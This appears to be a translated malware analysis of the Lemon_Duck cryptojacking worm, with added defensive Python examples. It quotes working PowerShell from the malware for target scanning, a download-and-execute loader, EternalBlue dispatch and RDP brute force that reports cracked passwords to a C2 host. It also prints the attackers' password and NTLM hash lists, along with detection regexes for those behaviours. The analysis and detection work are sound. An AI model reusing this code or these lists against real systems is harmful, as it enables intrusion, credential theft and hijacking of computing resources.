Recently, SophosLabs has observed a wave of Lemon_Duck cryptojacking attacks that not only spread rapidly inside enterprise networks but show signs of expanding worldwide. The attackers use a series of advanced techniques, including fileless script execution, abuse of open-source tools, and exploitation of vulnerabilities for lateral movement, with the ultimate goal of diverting large amounts of enterprise CPU capacity to cryptocurrency mining.
Because some of the scripts use "$Lemon_Duck" as a variable name, the campaign has been dubbed the Lemon_Duck PowerShell campaign.
Target selection
Target IP addresses are generated at random and scanned for listeners on specific ports: 445/TCP (SMB), 1433/TCP (MS-SQL Server) or 65529/TCP.
When the malicious script receives a response from a remote machine, it probes that IP address for the EternalBlue SMB vulnerability or brute-forces the MS-SQL service; a machine with an open listener on 65529/TCP has already been compromised by the attackers.
The logic the malicious script uses to generate random target IP addresses is as follows:
function getipaddrs{
    write-host "Get ipaddress..."
    $allip = @()
    [string[]]$ipsub = @('192.168.0','192.168.1','192.168.2','192.168.3','192.168.4','192.168.5','192.168.6','192.168.7','192.168.8','192.168.9','192.168.10','192.168.18','192.168.31','192.168.199','192.168.254','192.168.67','10.0.0','10.0.1','10.0.2','10.1.1','10.90.90','10.1.10','10.10.1')
    $regex = [regex]"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
    # harvest every IPv4 address visible in the local configuration, DNS cache and socket table
    $regex.Matches((ipconfig /all)) | ForEach-Object { if ($allip -notcontains $_.Value) { $allip += $_.Value } }
    $regex.Matches((ipconfig /displaydns)) | ForEach-Object { if ($allip -notcontains $_.Value) { $allip += $_.Value } }
    $regex.Matches((netstat -ano)) | ForEach-Object { if ($allip -notcontains $_.Value) { $allip += $_.Value } }
    foreach($IP in $allip) {
        if ($IP.StartsWith("127.") -or ($IP -match '25\d.') -or ($IP -match '24\d.') -or $IP.StartsWith("0.") -or $IP.StartsWith("169.254") -or $IP -eq '1.0.0.127') {
        }else{
            # keep the /24 of every harvested address
            $iptemp = $ip.Split(".")
            $SubnetIP = $iptemp[0] + "." + $iptemp[1] + "." + $iptemp[2]
            if ($ipsub -notcontains $SubnetIP) { $ipsub = @($SubnetIP) + $ipsub }
        }
    }
    try{
        # the host's public /24, looked up via ipify
        $NetObject = New-Object Net.WebClient
        $wlanip = $NetObject.DownloadString("https://api.ipify.org/")
        $wlaniptemp = $wlanip.Split(".")
        $wlansub = $wlaniptemp[0] + "." + $wlaniptemp[1] + "." + $wlaniptemp[2]
        if($ipsub -notcontains $wlansub) { $ipsub += $wlansub }
    }catch{}
    try{
        $ipaddress = [System.Net.DNS]::GetHostByName($null).AddressList
        $localip = @()
        Foreach ($ip in $ipaddress) {
            $localip += $ip.IPAddressToString
            $intiptemp = $ip.IPAddressToString.Split(".")
            if($intiptemp[0] -ne '127'){
                $intipsub = $intiptemp[0] + "." + $intiptemp[1] + "." + $intiptemp[2]
                if($ipsub -notcontains $intipsub) { $ipsub += $intipsub }
            }
        }
    }catch{}
    # add up to 30 random /24 subnets
    for($i=0; $i -lt 30; $i++){
        try{
            $ran_ipsub = "" + (1+(Get-Random -Maximum 254)) + "." + (1+(Get-Random -Maximum 254)) + "." + (1+(Get-Random -Maximum 254))
            if($ipsub -notcontains $ran_ipsub){
                $ipsub += "" + (1+(Get-Random -Maximum 254)) + "." + (1+(Get-Random -Maximum 254)) + "." + (1+(Get-Random -Maximum 254))
            }
        }catch{}
    }
    # expand every subnet into its 254 host addresses, excluding the machine's own
    $global:ipaddrs = @()
    foreach($ipsub2 in $ipsub) {
        write-host $ipsub2
        $global:ipaddrs += 1..254|%{$ipsub2+"."+$_}
    }
    $global:ipaddrs = @($global:ipaddrs | Where-Object { $localip -notcontains $_ })
    write-host "Get address done!!"
}
The next part drives the scan for the specific listening ports:
function localscan {
    Param( [int]$Port = 445 )
    write-host "scan port $port..."
    [string[]]$openips = @()
    $clients = @{}
    $connects = @{}
    # fire off an asynchronous connect to every candidate address
    foreach($ip in $ipaddrs) {
        try{
            $client = New-Object System.Net.Sockets.TcpClient
            $connect = $client.BeginConnect($ip,$port,$null,$null)
            $connects[$ip] = $connect
            $clients[$ip] = $client
        }catch{}
    }
    Start-Sleep -Milli 3000
    # anything connected after three seconds is recorded as an open port
    foreach($ip in $clients.Keys) {
        if ($clients[$ip].Connected) {
            $clients[$ip].EndConnect($connects[$ip])
            $openips += $ip
        }
        $clients[$ip].Close()
    }
    write-host $openips.count
    return ,$openips
}
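From the defender's side, the scanner above has a distinctive footprint: one internal host opens connections to many distinct addresses on 445, 1433 and 65529 within a few seconds. The following added example (not code from the article or from Sophos) shows detection logic for that fan-out over constructed flow-log records: it parses the lines, groups them by source, and flags any source that touches at least `min_targets` distinct destinations on the probed ports inside a sliding five-minute window. The log format, hostnames, addresses and thresholds are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Ports the Lemon_Duck scanner probes, per the article.
PROBED_PORTS = {445, 1433, 65529}

# Assumed flow-log line shape: "<iso timestamp> src=<ip> dst=<ip> dport=<port> action=<...>".
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<port>\d+)")


def build_sample_log() -> str:
    """Constructed flow records (not real telemetry) for three hosts."""
    base = datetime(2019, 10, 1, 9, 0, 0)
    lines = []
    # Scanner: 25 distinct hosts on 445/1433 inside two minutes.
    for i in range(25):
        ts = (base + timedelta(seconds=4 * i)).isoformat()
        lines.append(f"{ts} src=10.0.0.23 dst=10.0.1.{i + 1} dport={445 if i % 2 == 0 else 1433} action=SYN")
    # Slow host: 25 hosts on 445, one every three minutes (never 20 within five minutes).
    for i in range(25):
        ts = (base + timedelta(minutes=3 * i)).isoformat()
        lines.append(f"{ts} src=10.0.0.9 dst=10.0.2.{i + 1} dport=445 action=SYN")
    # Benign workstation: three file servers on 445 plus one HTTPS connection.
    for i in range(3):
        ts = (base + timedelta(seconds=30 * i)).isoformat()
        lines.append(f"{ts} src=10.0.0.5 dst=10.0.0.{100 + i} dport=445 action=SYN")
    lines.append(f"{base.isoformat()} src=10.0.0.5 dst=203.0.113.10 dport=443 action=SYN")
    return "\n".join(lines)


def parse_flows(text: str) -> list:
    """Return (timestamp, src, dst, dport) tuples; lines that do not match are skipped."""
    flows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            flows.append((datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["port"])))
    return flows


def find_scanners(flows: list, min_targets: int = 20, window: timedelta = timedelta(minutes=5)) -> dict:
    """Flag sources that reached >= min_targets distinct destinations on probed ports
    within any `window`-long interval. Returns {src: {"distinct_targets": n, "ports": [...]}}."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        if port in PROBED_PORTS:
            by_src[src].append((ts, dst, port))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        counts = defaultdict(int)   # destination -> events currently inside the window
        left, peak = 0, 0
        for ts, dst, _ in events:
            counts[dst] += 1
            # slide the left edge forward until every event lies within `window` of `ts`
            while events[left][0] < ts - window:
                old_dst = events[left][1]
                counts[old_dst] -= 1
                if counts[old_dst] == 0:
                    del counts[old_dst]
                left += 1
            peak = max(peak, len(counts))
        if peak >= min_targets:
            alerts[src] = {"distinct_targets": peak, "ports": sorted({p for _, _, p in events})}
    return alerts


if __name__ == "__main__":
    for src, info in find_scanners(parse_flows(build_sample_log())).items():
        print(f"possible scanner {src}: {info['distinct_targets']} targets on ports {info['ports']}")
```

The slow host is deliberately included: a per-window distinct-destination count catches the burst the script produces but stays quiet for ordinary file-server traffic, which is the trade-off a threshold like this always makes.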
Finally, the attackers attempt to brute-force the credentials of the Microsoft SQL Server "sa" (system administrator) account using a dictionary of passwords and hashes. The script contains a long list of passwords, including ones used by various threat groups that previously spread Mirai or other IoT botnet malware. The attackers also use a series of NTLM hashes to carry out "pass the hash" attacks.
The password list is as follows:
"saadmin","123456","password","PASSWORD","123.com","[email protected]","Aa123456","qwer12345","[email protected]","[email protected]","golden","[email protected]#qwe","[email protected]","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","[email protected]", "999999","Passw0rd","[email protected]#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678", "123456789","987654321","admin","abc123","abcd1234","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","iloveyou","monkey","login","passw0rd","master","hello", "qazwsx","password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a","123123123","1234567890","88888888","111111111", "112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","[email protected]#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008", "abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456"
The script's NTLM hash set is as follows:
"31d6cfe0d16ae931b73c59d7e0c089c0","32ed87bdb5fdc5e9cba88547376818d4","8846f7eaee8fb117ad06bdd830b7586c","7b592e4f8178b4c75788531b2e747687","afffeba176210fad4628f0524bfe1942", "579da618cfbfa85247acf1f800a280a4", "47bf8039a8506cd67c524a03ff84ba4e","5ae7b89b3afea28d448ed31b5c704289","3f9f5f112da330ac4c20be279c6addfa","73f5d97549f033374fa6d9f9ce247ffd", "6f12c0ab327e099821bd938f39faab0d","e5ae562ddfaa6b446c32764ab1ebf3ed", "161cff084477fe596a5db81874498a24","d30c2ef8389ac9e8516baacb29463b7b","bc007082d32777855e253fd4defe70ee", "e45a314c664d40a227f9540121d1a29d","d144986c6122b1b1654ba39932465528","f4bb18c1165a89248f9e853b269a8995", "570a9a65db8fba761c1008a51d4c95ab","e1a692bd23bde99b327756e59308b4f8", "a87f3a337d73085c45f9416be5787d86","00affd88fa323b00d4560bf9fef0ec2f","31fc0dc8f7dfad0e8bd7ccc3842f2ce9","674e48b68c5cd0efd8f7e5faa87b3d1e", "69943c5e63b4d2c104dbbcc15138b72b", "588feb889288fb953b5f094d47d1565c","bcdf115fd9ba99336c31e176ee34b304","3dbde697d71690a769204beb12283678","df54de3f3438343202c1dd523d0265be","7ce21f17c0aee7fb9ceba532d0546ad6", "7a21990fcd3d759941e45c490f143d5f","579110c49145015c47ecd267657d3174","af27efb60c7b238910efe2a7e0676a39","2d7f1a5a61d3a96fb5159b5eef17adc6","4057b60b514c5402dde3d29a1845c366", "e8cd0e4a9e89eab931dc5338fcbec54a", "6920c58d0df184d829189c44fafb7ece","3fa45a060bd2693ae4c05b601d05ca0c","ba07ba35933e5bf42dea4af8add09d1e","f1351ac828428d74f6da2968089fc91f", "e84d037613721532e6b6d84d215854b6","2f2d544c53b3031f24d63402ea7fb4f9", "328727b81ca05805a68ef26acb252039","259745cb123a52aa2e693aaacca2db52","c22b315c040ae6e0efee3518d830362b", "162e829be112225fedf856e38e1c65fe","209c6174da490caeb422f3fa5a7ae634","f9e37e83b83c47a93c2f09f66408631b", "b3ec3e03e2a202cbd54fd104b8504fef","4ed91524cb54eaacc17a185646fb7491", "aa647b916a1fad374df9c30711d58a7a","a80c9cc3f8439ada25af064a874efe2d","13b29964cc2480b4ef454c59562e675c","de26cce0356891a4a020e7c4957afc72", "e19ccf75ee54e06b06a5907af13cef42", 
"30fcaa8ad9a496b3e17f7fbfacc72993","41630abb825ca50da31ce1fac1e9f54d","f56a8399599f1be040128b1dd9623c29","2e4dbf83aa056289935daea328977b20","b963c57010f218edc2cc3c229b5e4d0f", "f2477a144dff4f216ab81f2ac3e3207d","e6bd4cdb1e447131b60418f31d0b81d6","b9f917853e3dbf6e6831ecce60725930","6d3986e540a63647454a50e26477ef94","066ddfd4ef0e9cd7c256fe77191ef43c", "152efbcfafeb22eabda8fc5e68697a41", "5835048ce94ad0564e29a924a03510ef","2d20d252a479f485cdf5e171d93985bf","320a78179516c385e35a93ffa0b1c4ac","0d757ad173d2fc249ce19364fd64c8ec", "72f5cfa80f07819ccbcfb72feb9eb9b7","f67f5e3f66efd7298be6acd32eeeb27c", "1c4ecc8938fb93812779077127e97662","ad70819c5bc807280974d80f45982011","a836ef24f0a529688be2af1479a95411", "36aa83bdcab3c9fdaf321ca42a31c3fc","acb98fd0478427cd18949050c5e87b47","85deeec2d12f917783b689ae94990716", "a4141712f19e9dd5adf16919bb38a95c","e7380ae8ef85ae55bdceaa59e418bd06", "81e5f1adc94dd08b1a072f9c1ae3dd3f","71c5391067de41fad6f3063162e5eeff"
If you run an MS-SQL server exposed to the public internet and its password appears in the list above, then even if it has not been attacked yet, it is only a matter of time.
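A practical way to act on both lists above is to check your own accounts against them: an NT hash that appears in the attacker's pass-the-hash set can be replayed without cracking, and a password in the attacker's wordlist will fall to the brute-force module. The following added example (not code from the article or from Sophos) computes NTLM hashes (MD4 over the UTF-16LE password) with a small pure-Python MD4, since many OpenSSL builds no longer expose MD4 in hashlib, maps a subset of the quoted hashes back to plaintexts, and audits a constructed account export. The account names and the hash and password subsets are assumptions; entries that were mangled on the page are omitted.

```python
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), enough for NTLM hashes in an offline audit."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F(b,c,d) = (b & c) | (~b & d)
            a = rotl((a + ((b & c) | (~b & d)) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G(b,c,d) = majority, word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
        for i in range(16):  # round 3: H(b,c,d) = b ^ c ^ d
            a = rotl((a + (b ^ c ^ d) + x[order[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def ntlm_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


# Subset of the attacker's NTLM list quoted above.
LEMON_DUCK_NTLM = {
    "31d6cfe0d16ae931b73c59d7e0c089c0", "32ed87bdb5fdc5e9cba88547376818d4",
    "8846f7eaee8fb117ad06bdd830b7586c", "209c6174da490caeb422f3fa5a7ae634",
    "e19ccf75ee54e06b06a5907af13cef42",
}
# Subset of the attacker's password list quoted above.
LEMON_DUCK_PASSWORDS = ["123456", "password", "Passw0rd", "admin", "sa", "sapassword", "sql2008", "sa2008"]


def resolve_hashes(hashes=LEMON_DUCK_NTLM, wordlist=LEMON_DUCK_PASSWORDS) -> dict:
    """Map attacker hashes back to plaintexts found in the wordlist: {hash: password}."""
    found = {}
    for word in wordlist:
        h = ntlm_hash(word)
        if h in hashes:
            found[h] = word
    return found


def audit_accounts(accounts: dict, hashes=LEMON_DUCK_NTLM, wordlist=LEMON_DUCK_PASSWORDS) -> list:
    """accounts maps username -> NT hash hex (as exported by a local SAM/NTDS audit).
    Returns usernames whose hash is directly in the attacker's list or is the hash of
    a password in the attacker's wordlist, i.e. accounts this campaign can take over."""
    exposed = set(hashes) | {ntlm_hash(w) for w in wordlist}
    return sorted(user for user, h in accounts.items() if h.lower() in exposed)


# Constructed audit export; usernames and passwords are placeholders.
SAMPLE_ACCOUNTS = {
    "sqlsvc": ntlm_hash("password"),
    "backup_admin": ntlm_hash("Winter2019!Rotated"),
    "guest": ntlm_hash(""),
    "dba": ntlm_hash("sa2008"),
}

if __name__ == "__main__":
    for h, pw in resolve_hashes().items():
        print(f"{h} = NTLM({pw!r})")
    print("exposed accounts:", audit_accounts(SAMPLE_ACCOUNTS))
```

Note that the empty-password hash (31d6cfe0d16ae931b73c59d7e0c089c0) is the first entry in the attacker's list, so disabled-but-blank accounts are worth checking alongside weak ones.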
The Lemon_Duck kill chain
The malicious script uses the Windows Task Scheduler to download and execute a fresh copy of the malware every hour. The initially downloaded script verifies itself against a hard-coded hash before executing; if the check succeeds, it downloads the remaining payloads, namely the miner and the exploitation modules.
The checksum verification in the script looks like this (the comment line is an analyst annotation):
$tm1='$Lemon_Duck=''_T''; $y=''_U'';$z=$y+''p''+'''$v''';
$m=(New-Object System.Net.WebClient).DownloadData($y);
# Downloaded MD5 should be equal to 'd8109cec0a51719be6f411f67b3b7ec1'
[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString(''x2'')};
if($s-eq''d8109cec0a51719be6f411f67b3b7ec1''){ IEX(-join[char[]]$m) }
The variable $Lemon_Duck stores the task's file name, which is passed to the command-and-control server in the User-Agent string. Once this check completes, the script begins downloading payloads.
Propagation and lateral movement
The script also uses the initially infected machine as a foothold to spread laterally through the network. It employs several methods, including:
· EternalBlue: exploitation of the SMB service vulnerability
· USB and network drives: the script writes malicious Windows *.lnk shortcut files and DLL files to removable storage or mapped network drives attached to the infected machine (CVE-2017-8464)
· Startup folder: the script writes files to startup locations in the Windows file system (for example the Start menu's Startup folder) so that they execute after a reboot.
· MS-SQL Server brute force: the password list above is tried against the SQL Server "SA" account.
· Pass-the-hash attack: using the NTLM hashes listed above
· Executing malicious commands on remote machines via WMI
· RDP brute force
The script also creates one or more scheduled tasks that launch the malicious script a few minutes after the initial attack. This technique may be meant to evade behaviour-based detection by security tools, but the approach is crude: such tools can recognise an attack in progress by tracking the sequence and timing of events, and in principle, once the number of suspicious commands within a short period exceeds a threshold, the attack is blocked.
After the new script is downloaded from the C&C server, it deletes the initially created scheduled task entries. Some examples of the attackers' propagation methods follow:
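The threshold-within-a-window detection described above can be made concrete. The following added example (not code from the article or from Sophos) scores constructed process-creation records against command-line markers taken from the loader and task logic shown earlier (IEX of downloaded content, the hard-coded MD5 check, the $Lemon_Duck variable, in-memory execution via -join[char[]], scheduled-task creation) and flags a host when the indicator count inside a five-minute sliding window reaches a threshold. The log format, hostnames, task name, c2.invalid URL and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line markers drawn from the loader, task-scheduling and in-memory
# execution behaviour described in the article.
INDICATORS = {
    "download_exec": re.compile(r"IEX\s*\(.*Download(String|Data)", re.I),
    "hash_pinned_loader": re.compile(r"Cryptography\.MD5\]::Create\(\)\.ComputeHash", re.I),
    "lemon_duck_var": re.compile(r"\$Lemon_Duck", re.I),
    "in_memory_exec": re.compile(r"IEX\s*\(\s*-join\s*\[char\[\]\]", re.I),
    "task_create": re.compile(r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I),
}

# Assumed record shape: "<iso timestamp> host=<name> cmd=<command line>".
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) cmd=(?P<cmd>.*)$")

# Constructed process-creation records; WS01 shows the loader sequence, WS07 is benign.
SAMPLE_EVENTS = r"""
2019-10-01T09:00:00 host=WS01 cmd=schtasks /create /tn UpdateTask01 /sc minute /mo 60 /tr "powershell -w hidden IEX(New-Object Net.WebClient).DownloadString('http://c2.invalid/a.jsp')"
2019-10-01T09:02:10 host=WS01 cmd=powershell -c "$Lemon_Duck='UpdateTask01';$m=(New-Object System.Net.WebClient).DownloadData('http://c2.invalid/a.jsp');[System.Security.Cryptography.MD5]::Create().ComputeHash($m)"
2019-10-01T09:02:45 host=WS01 cmd=powershell -w hidden IEX(-join[char[]]$m)
2019-10-01T09:00:30 host=WS07 cmd=powershell -c Get-Process
2019-10-01T10:30:00 host=WS07 cmd=schtasks /create /tn NightlyBackup /sc daily /tr C:\backup\run.exe
"""


def parse_events(text: str) -> list:
    """Return (timestamp, host, command line) tuples for lines matching LINE_RE."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["host"], m["cmd"]))
    return events


def score_command(cmd: str) -> list:
    """Names of every indicator the command line matches."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def find_bursts(events: list, threshold: int = 3, window: timedelta = timedelta(minutes=5)) -> dict:
    """Flag hosts whose indicator hits inside any `window` reach `threshold`.
    Returns {host: {"hits": peak count, "indicators": sorted names in that window}}."""
    by_host = defaultdict(list)
    for ts, host, cmd in events:
        names = score_command(cmd)
        if names:
            by_host[host].append((ts, names))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        left, running, best, best_names = 0, 0, 0, set()
        for right, (ts, names) in enumerate(hits):
            running += len(names)
            while hits[left][0] < ts - window:   # drop events older than the window
                running -= len(hits[left][1])
                left += 1
            if running > best:
                best = running
                best_names = {n for _, ns in hits[left:right + 1] for n in ns}
        if best >= threshold:
            alerts[host] = {"hits": best, "indicators": sorted(best_names)}
    return alerts


if __name__ == "__main__":
    for host, info in find_bursts(parse_events(SAMPLE_EVENTS)).items():
        print(f"{host}: {info['hits']} indicator hits, {', '.join(info['indicators'])}")
```

WS07's lone `schtasks /create` is scored but never reaches the threshold, which is the point of counting over a window rather than alerting on any single marker: scheduled-task creation on its own is routine administration.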
EternalBlue:
The attackers use the PingCastle tool to scan 445/TCP and check whether the host is vulnerable to EternalBlue.
PingCastle EternalBlue vulnerability scanner
The script then attacks the vulnerable machine with EternalBlue, first determining which Windows version the target runs.
try{
    write-host "start eb scanning..."
    $vul=[PingCastle.Scanners.m17sc]::Scan($currip)   # scan for vulnerable IP
    if($vul) {
        write-host "$currip seems eb vulnerable..."
        $res = eb7 $currip $sc                          # targeting win7 & older versions
        if($res) {
            write-host "$currip eb7 got it!!!"
        } else {
            $res = eb8 $currip $sc                      # Windows 8, 10 & 2012
            if($res) { write-host "$currip eb8 got it!!!" }
        }
    }
}catch{}
Once the version is determined, the script launches the "SMB Exploitation Module" shown below.
Lemon_Duck's EternalBlue attack code
LNK remote code execution:
In a recent update, the attackers introduced a Windows shortcut (*.lnk) exploit component. It exploits CVE-2017-8464 by copying the malicious DLL component and the corresponding *.lnk file to USB removable storage devices or network drives in order to spread.
The USBLNK component can spread to FAT32 or NTFS file shares and removable storage devices
The script also creates a file named "UTFsync inf_data" – (file_location) as a marker to confirm that the drive has already been infected with the *.lnk and *.dll components, so that it is not infected again.
Pass-the-hash attack:
The script checks the user's account privileges. If the user has administrator rights, the script calls the PowerDump module and Mimikatz to dump all NTLM hashes, usernames, passwords and domain information, then uses these credentials to upload the malicious script files, followed by the associated batch or *.lnk files, into the %startup% folder of reachable remote machines, or uses WMI to execute PowerShell code remotely.
PowerDump module:
This module closely resembles an open-source script used for penetration testing, and ships with two additional open-source script tools.
The malware uses Mimikatz to collect credentials and calls the following PowerShell modules:
"Invoke-SE": executes malicious batch commands on remote machines.
"Invoke-SMBC": lists the IPC$ shares of all SMB-protected users. It performs three different operations: "List", "Put" and "Delete".
The malicious script calls several open-source penetration-testing PowerShell scripts
MS-SQL Server brute force:
The script port-scans the active IP addresses and enumerates every machine with 1433/TCP open (the port used by the Microsoft SQL service), then brute-forces the "SA" account with its password list, made up of the passwords shown above plus passwords harvested from the local network with Mimikatz.
After successfully cracking an MS-SQL Server account, the script uses the sqlserver.exe process to execute malicious commands on other machines.
RDP brute force:
The RDP module scans for open servers listening on the default RDP port 3389/TCP and attempts to log in with the username "administrator". The script cycles through the hard-coded password list using the "freerdp" open-source utility. After a successful login, it executes malicious commands on the machine.
foreach($currip in $rdp_portopen[1]) {
    $currip
    if (($old_portopen -notcontains $currip) -and ($currip.length -gt 6)){
        write-host "start rdp scanning..."
        foreach($password in $allpass){
            write-host "Try pass:$password"
            # first probe: does this password log in?
            $flag = (new-object RDP.BRUTE).check($exepath,$currip,"administrator",$password,$false)
            if($flag){
                write-host "SUCC!!"
                $brute = new-object RDP.BRUTE
                # second connection: report the hit to the C2 and run the payload command
                if($brute.check($exepath,$currip,"administrator",$password,$true)){
                    (New-Object Net.WebClient).DownloadString($log_url+'/report.json?type=rdp&ip='+$currip+'&pass='+$password+'&t='+$t)
                    [RDP.CMD]::runCmd($rdp_code)
                    write-host "Try to run command!!"
                }
                start-sleep 10
                $brute.exit()
                break;
            }
        }
    }
}
RDP brute-force launcher code
If a machine is compromised by any of the methods above, the script modifies the Windows firewall settings to open port 65529/TCP. This serves as a marker by which the malicious script recognises machines that are already compromised.
This exploitation code runs continuously, pausing five minutes each time a new list of random IP addresses is generated. The script scans for SMB and MS-SQL services and, on every run, also collects performance information about the machine and sends it to the command-and-control server.
Tracking status sent back to the C2:
This module runs only the first time a machine is compromised, typically at the end of the kill chain, after all downloaded modules (local exploitation, lateral movement and mining scripts) have executed. It reports the machine profile along with the status of each executed module back to its C2 server.
write-host "reporting"
try{
    $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
    $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
    $comp_name = $env:COMPUTERNAME
    $wf = test-path $env:tmp\wfreerdp.exe   # RDP utility
    $mf = test-path $env:tmp\mimi.dat       # mimikatz
    (New-Object Net.WebClient).DownloadString($log_url+'/log.json?V=0.1&ID='+$comp_name+'&GUID='+$guid+'&MAC='+$mac+'&retry='+$retry+
        '&pc1='+$portopen[1].count+'&pc2='+$ms_portopen[1].count+'&pc3='+$old_portopen[1].count+'&pc4='+$rdp_portopen[1].count+
        '&pci='+$ipaddrs_i.count+'&pco='+$ipaddrs_o.count+'&pcb='+$global:ipaddrs_b+'&mi='+($getpasswd -join "^^")+'&wf='+[Int]$wf+'&mf='+[Int]$mf)
}catch{}
Continuous C2 monitoring:
The infected machine keeps sending reports to the C2 server on the status of the latest exploitation and mining modules. This module executes after all payload script modules have run. The parameters sent back to the C2 server include details about the compromised user account, the machine configuration, user privileges, and the status of the exploitation and mining payloads.
hxxp://<redacted.com>/report.jsp?ID=HAWKINS-PC&GUID=2D3EC845-35CD-1346-876E-96257ADE6A2F&MAC=&OS=6.1.7601&BIT=32&USER=HAWKINS-PC$&DOMAIN=WORKGROUP&D=&CD=Standard%20VGA%20Graphics%20Adapter&P=1&FI=0&FM=0&IF=0&MF=0&HR=&UP=664.468&_T=1569808438.79244
Parameters:
· $comp_name = computer name
· $guid = machine UUID
· $mac = MAC address of the machine
· $os = installed OS version
· $bit = 32- or 64-bit architecture
· $user = username
· $domain = user domain
· $uptime = system uptime
· $card = installed graphics card name
· $if_ = exploit and threat propagation module
· $mf_ = active 32- or 64-bit mining module
· $drive = removable and network drive information
· $timestamp = date in UFormat
· $isA = whether an AMD Radeon graphics card is installed and the machine is 64-bit
· $permit = is administrator
· FI & IF = confirm the threat propagation module has executed and is running
· FM & MF = confirm the mining module has executed and is running
· HR = miner hashrate information
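The beacon above is a useful proxy-log signature: a fixed set of endpoints and a fixed parameter vocabulary. The following added example (not code from the article or from Sophos) parses URLs of that shape, requires the ID, GUID and MAC parameters that appear in both the log.json and report.jsp beacons, and turns the quoted report URL into a summary of the infection state (admin rights, propagation and miner flags). The mapping of the P parameter to the $permit flag and the uptime unit are assumptions; the intranet.invalid URL and the surrounding proxy-log lines are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Beacon endpoints and parameters quoted in the article.
BEACON_PATHS = {"/report.jsp", "/log.json", "/report.json"}
REQUIRED_PARAMS = {"ID", "GUID", "MAC"}

# The report URL shown above (host redacted in the original).
SAMPLE_URL = (
    "hxxp://<redacted.com>/report.jsp?ID=HAWKINS-PC&GUID=2D3EC845-35CD-1346-876E-96257ADE6A2F"
    "&MAC=&OS=6.1.7601&BIT=32&USER=HAWKINS-PC$&DOMAIN=WORKGROUP&D=&CD=Standard%20VGA%20Graphics%20Adapter"
    "&P=1&FI=0&FM=0&IF=0&MF=0&HR=&UP=664.468&_T=1569808438.79244"
)

# Constructed proxy-log excerpt: one beacon among ordinary requests.
CONSTRUCTED_PROXY_LOG = [
    "http://intranet.invalid/report.jsp?page=2&sort=date",
    SAMPLE_URL,
    "http://intranet.invalid/log.json?level=info",
]


def parse_beacon(url: str):
    """Return the beacon's parameters if `url` has the Lemon_Duck report shape, else None."""
    parts = urlsplit(url)
    if parts.path not in BEACON_PATHS:
        return None
    # keep_blank_values: the beacon sends empty MAC=, D= and HR= fields
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if not REQUIRED_PARAMS <= params.keys():
        return None
    return params


def _flag(params: dict, *keys: str) -> bool:
    """True when any of the given status parameters is set to 1."""
    return any(params.get(k) == "1" for k in keys)


def beacon_summary(params: dict) -> dict:
    """Reduce a parsed beacon to the fields an incident responder acts on."""
    return {
        "host": params.get("ID"),
        "domain": params.get("DOMAIN"),
        "os": params.get("OS"),
        "bits": int(params["BIT"]) if params.get("BIT") else None,
        "is_admin": params.get("P") == "1",                 # assumed: P carries the $permit flag
        "propagation_active": _flag(params, "FI", "IF"),    # FI & IF per the parameter list
        "miner_active": _flag(params, "FM", "MF"),          # FM & MF per the parameter list
        "uptime": float(params["UP"]) if params.get("UP") else None,  # unit not stated on the page
        "graphics": params.get("CD"),
    }


def find_beacons(urls) -> list:
    """Summaries of every URL that parses as a beacon."""
    found = []
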